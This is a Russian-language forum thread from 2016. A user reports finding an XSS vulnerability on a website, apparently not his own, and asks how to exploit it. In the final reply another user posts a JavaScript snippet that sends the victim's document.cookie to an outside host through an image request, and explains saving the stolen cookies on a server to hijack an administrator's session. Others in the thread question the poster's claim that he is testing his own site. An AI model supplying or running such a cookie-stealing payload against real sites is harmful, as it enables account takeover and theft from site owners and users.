{% else-1 %}
Обновить | Подписаться | Поднять тему
Чтобы выполнить действие авторизируйтесь или пройдите регистрацию на сайте.
1.
XaKeRoK * 0.01
[автор] (11 мар 2016, 14:51) [0/0] [0] [отв] [спам] [под] +1 | -1

Привет всем....в общем нашёл я на одном сайте xss уязвимость....при помощи вставки кода в поле xss заработало...но вот мучает вопрос как внедрить код с помощью это xss или как например изменить что-то в бд с помощью xss?

2. (11 мар 2016, 14:52) [0/0] [0] [отв] [спам] [под] +1 | -1

Изменить никак, можешь только угнать куки у админа.
Добавлено 11.03.16 в 14:53:25:
Но не факт, что у них однаковые куки для фронт и бекэнда

3. (11 мар 2016, 14:55) [1/0] [1] [отв] [спам] [под] +1 | -1

не хак форум*

4.
XaKeRoK * 0.01
[автор] (11 мар 2016, 14:55) [0/0] [0] [отв] [спам] [под] +1 | -1
ЗЕЛЁНЫЙ ШЕРШЕНЬ,

я просто свой сайт тестию)))

5.
XaKeRoK * 0.01
[автор] (11 мар 2016, 14:56) [0/0] [0] [отв] [спам] [под] +1 | -1

Rakovskiy,

6.
XaKeRoK * 0.01
[автор] (11 мар 2016, 15:00) [0/0] [0] [отв] [спам] [под] +1 | -1

Rakovskiy, можешь по точнее сказать как угнать куки админа?

7. (11 мар 2016, 15:03) [1/0] [1] [отв] [спам] [под] +1 | -1
XaKeRoK,

А какая разница что ты тестишь? На слово поверить?

8.
Cat * 22.38
(11 мар 2016, 15:07) [0/0] [0] [отв] [спам] [под] +1 | -1
ЗЕЛЁНЫЙ ШЕРШЕНЬ,

Реально, сейчас послушаю где находится уязвимость, и пойду хакну *

9. (11 мар 2016, 15:08) [0/0] [0] [отв] [спам] [под] +1 | -1
Cat,

Ты лучше в лоток срать научись. Более пригодится.

10. (11 мар 2016, 15:08) [0/0] [0] [отв] [спам] [под] +1 | -1

XaKeRoK,

var img=new Image();
img.src="http://site.ru/xss.jpg?"+ encodeURI(document.cookie);

Запрос получаешь и сохраняешь куки в текстовый файл на сервере.

PHP код не дам, т.к я и так почти нарушил правила, это не хак форум.

Чтобы писать сообщения авторизируйтесь или пройдите регистрацию на сайте.
Подписаны: 1
Скачать тему | Файлы темы | Фильтр сообщений